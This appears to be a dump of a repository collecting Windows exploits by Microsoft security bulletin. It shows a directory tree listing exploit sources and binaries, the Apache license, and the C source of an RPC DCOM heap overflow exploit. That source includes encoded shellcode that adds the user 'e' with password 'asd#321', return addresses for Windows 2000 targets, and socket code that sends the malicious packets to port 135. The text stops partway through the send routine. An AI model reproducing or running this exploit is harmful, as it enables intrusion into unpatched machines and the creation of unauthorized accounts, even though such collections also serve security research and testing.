├── LICENSE ├── MS03-026 ├── 100.c ├── 100.exe ├── 66.c └── 66.out ├── MS05-039 - PnP Service ├── 1149.c └── MS05-039.exe ├── MS08-025 - win32k.sys ├── 5518.zip └── MS08-025.exe ├── MS08-067 ├── 40279.py ├── MS08-067.exe └── MS08-067_2K3.exe ├── MS08-068 ├── Disable_Port_445.reg ├── Enable_Port_445.reg ├── libeay32.dll ├── smbrelay3.exe ├── smrs.exe └── src │ ├── httprelay.cpp │ ├── httprelay.h │ ├── imaprelay.cpp │ ├── imaprelay.h │ ├── misc.cpp │ ├── misc.h │ ├── ntlm.cpp │ ├── ntlm.h │ ├── payload.cpp │ ├── payload.h │ ├── pop3relay.cpp │ ├── pop3relay.h │ ├── smb.cpp │ ├── smb.h │ ├── smbrelay.h │ ├── smbrelay3.cpp │ ├── smtprelay.cpp │ └── smtprelay.h ├── MS09-050 ├── 40280.py └── 41987.py ├── MS10-015 - KiTrap0D ├── ADVISORY ├── Makefile ├── README ├── screenshot.png ├── vdmallowed.c ├── vdmallowed.exe ├── vdmexploit.c └── vdmexploit.dll ├── MS10-059 - Chimichurri ├── 14610.zip └── MS10-059.exe ├── MS11-011 ├── 16262.c └── MS11-011.exe ├── MS11-046 ├── 40564.c └── MS11-046.exe ├── MS11-062 ├── 40627.c └── MS11-062.exe ├── MS11-080 - AFD.sys ├── MS11-080.exe └── MS11-080.py ├── MS14-002 ├── 30014.py ├── 37732.c └── MS14-002.exe ├── MS14-040 ├── 39446.py ├── 39525.py └── MS14-040.exe ├── MS14-058 ├── 37064.py ├── 39666.zip └── MS14-058.exe ├── MS14-068 ├── 35474.py └── MS14-068.exe ├── MS14-070 ├── 35936.exe ├── 35936.py ├── 37755.c └── 37755.exe ├── MS15-001 ├── 35661-poc.zip ├── AppCompatCache.exe └── TestDLL.dll ├── MS15-010 ├── 39035.exe └── 39035.zip ├── MS15-051 ├── 37049-src.zip ├── MS15-051_Taihou32.exe └── MS15-051_Taihou64.exe ├── MS15-076 ├── 37768 │ ├── Microsoft.VisualStudio.OLE.Interop.dll │ └── Trebuchet.exe └── 37768.zip ├── MS15-097 ├── 38198 │ ├── Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe │ └── injected.dll └── 38198.zip ├── MS16-016 ├── 39788 │ ├── EoP.exe │ └── Shellcode.dll └── 39788.zip ├── MS16-135 ├── 40823 │ ├── SetWindowLongPtr_Exploit.exe │ └── SetWindowLongPtr_Exploit.pdb ├── 40823.zip ├── 41015.c └── 41015.exe ├── MS17-010 ├── 41987.py └── MS17-010.exe └── README.md /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright {yyyy} {name of copyright owner} 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /MS03-026/100.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #pragma comment(lib,"ws2_32") 9 | 10 | unsigned char bindstr[]={ 11 | 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 12 | 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 13 | 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 14 | 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 15 | 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 16 | 17 | unsigned char request1[]={ 18 | 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 19 | ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 20 | ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 21 | ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 22 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E 23 | ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D 24 | ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 25 | ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 26 | ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 27 | ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 28 | ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 29 | ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 30 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 31 | ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 32 | ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 33 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 34 | ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 35 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 36 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 37 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 38 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 39 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 40 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 41 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 42 | ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 43 | ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 44 | ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF 45 | ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 46 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 47 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 48 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 49 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 50 | ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 51 | ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 52 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 53 | ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 54 | ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 55 | ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 56 | ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 57 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 58 | ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 59 | ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 60 | ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 61 | ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E 62 | ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 63 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 64 | ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 65 | ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 66 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 67 | ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 68 | ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 69 | ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 70 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 71 | ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 72 | ,0x00,0x00,0x00,0x00,0x00,0x00}; 73 | 74 | unsigned char request2[]={ 75 | 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 76 | ,0x00,0x00,0x5C,0x00,0x5C,0x00}; 77 | 78 | unsigned char request3[]={ 79 | 0x5C,0x00 80 | ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 81 | ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 82 | ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 83 | ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; 84 | 85 | //user="e" pass="asd#321" 86 | unsigned char sc_add_user[]= 87 | "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA" 88 | "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69" 89 | "\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5" 90 | "\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA" 91 | "\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED" 92 | "\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF" 93 | "\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A" 94 | "\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F" 95 | "\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99" 96 | "\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10" 97 | "\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA" 98 | "\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B" 99 | "\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA" 100 | "\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8" 101 | "\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9" 102 | "\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC" 103 | "\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8" 104 | "\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA" 105 | "\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED" 106 | "\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99"; 107 | #define sc_offset 0x24 108 | #define sc_max 0x208 109 | #define jmp_addr_offset sc_max+sc_offset+0x8 110 | #define top_seh_offset jmp_addr_offset+0x4 111 | 112 | unsigned char sc[]= 113 | "\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00" 114 | "\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00" 115 | "\x43\x00\x24\x00\x5c\x00" 116 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 117 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 118 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 119 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 120 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 121 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 122 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 123 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 124 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 125 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 126 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" 127 | "\xe9\xf3\xfd\xff\xff" 128 | "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"; 129 | 130 | unsigned char request4[]={ 131 | 0x01,0x10 132 | ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 133 | ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C 134 | ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 135 | }; 136 | 137 | struct 138 | { 139 | char *os; 140 | DWORD dwTopSeh; 141 | char *seh; 142 | DWORD dwJmpAddr; 143 | char *jmp; 144 | } 145 | targets[] = 146 | { 147 | { "2kEnSp4+MS03-026", 148 | 0x7c54144c, 149 | "kernel32.dll v5.0.2195.6688", 150 | 0x77a1b496, 151 | "OLEAUT32.dll v2.40.4522.0"}, 152 | { "2kEnSp3+SomeHotFixs+MS03-026", 153 | 0x77eda1f0, 154 | "kernel32.dll v5.0.2195.6079", 155 | 0x77a1afa9, 156 | "OLEAUT32.dll v2.40.4518.0"} 157 | }, v; 158 | void main(int argc,char ** argv) 159 | { 160 | WSADATA WSAData; 161 | SOCKET sock; 162 | int len,len1; 163 | SOCKADDR_IN addr_in; 164 | short port=135; 165 | unsigned char buf1[0x1000]; 166 | unsigned char buf2[0x1000]; 167 | int i, iType; 168 | 169 | printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n" 170 | "Base on flashsky's MS03-026 exp\n" 171 | "Code by ey4s\n" 172 | "2003-09-16\n" 173 | "Welcome to http://www.xfocus.net\n" 174 | "Thanks to flashsky & benjurry & Dave Aitel\n" 175 | "If success, target will add a user \"e\" and password is \"asd#321\"\n\n"); 176 | 177 | if(argc!=3) 178 | { 179 | printf("Usage: %s \n", argv[0]); 180 | for(i = 0; i < sizeof(targets)/sizeof(v); i++) 181 | printf( "<%d> %s\n" 182 | " TopSeh=0x%.8x in %s\n" 183 | " JmpAddr=0x%.8x in %s\n", 184 | i, targets[i].os, 185 | targets[i].dwTopSeh, targets[i].seh, 186 | targets[i].dwJmpAddr, targets[i].jmp); 187 | return; 188 | } 189 | 190 | iType = atoi(argv[2]); 191 | if((iType<0) || iType > sizeof(targets)/sizeof(v)) 192 | { 193 | printf("[-] Wrong type.\n"); 194 | return; 195 | } 196 | 197 | memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user)); 198 | memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4); 199 | memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4); 200 | printf("[+] Prepare shellcode completed.\n"); 201 | 202 | if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) 203 | { 204 | printf("WSAStartup error.Error:%d\n",WSAGetLastError()); 205 | return; 206 | } 207 | 208 | addr_in.sin_family=AF_INET; 209 | addr_in.sin_port=htons(port); 210 | addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]); 211 | 212 | if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) 213 | { 214 | printf("Socket failed.Error:%d\n",WSAGetLastError()); 215 | return; 216 | } 217 | if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) 218 | { 219 | printf("Connect failed.Error:%d",WSAGetLastError()); 220 | return; 221 | } 222 | printf("[+] Connect to %s:135 success.\n", argv[1]); 223 | 224 | if(sizeof(sc_add_user) > sc_max) 225 | { 226 | printf("[-] shellcode too long, exit.\n"); 227 | return; 228 | } 229 | 230 | 231 | len=sizeof(sc); 232 | memcpy(buf2,request1,sizeof(request1)); 233 | len1=sizeof(request1); 234 | *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; //¼ÆËãÎļþÃûË«×Ö½Ú³¤¶È 235 | *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//¼ÆËãÎļþÃûË«×Ö½Ú³¤¶È 236 | memcpy(buf2+len1,request2,sizeof(request2)); 237 | len1=len1+sizeof(request2); 238 | memcpy(buf2+len1,sc,sizeof(sc)); 239 | len1=len1+sizeof(sc); 240 | memcpy(buf2+len1,request3,sizeof(request3)); 241 | len1=len1+sizeof(request3); 242 | memcpy(buf2+len1,request4,sizeof(request4)); 243 | len1=len1+sizeof(request4); 244 | *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc; 245 | //¼ÆËã¸÷ÖֽṹµÄ³¤¶È 246 | *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; 247 | *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc; 248 | *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc; 249 | *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc; 250 | *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc; 251 | *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc; 252 | *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc; 253 | 254 | len = send(sock,bindstr,sizeof(bindstr),0); 255 | if(len<=0) 256 | { 257 | printf("[-] Send failed.Error:%d\n",WSAGetLastError()); 258 | return; 259 | } 260 | else 261 | printf("[+] send %d 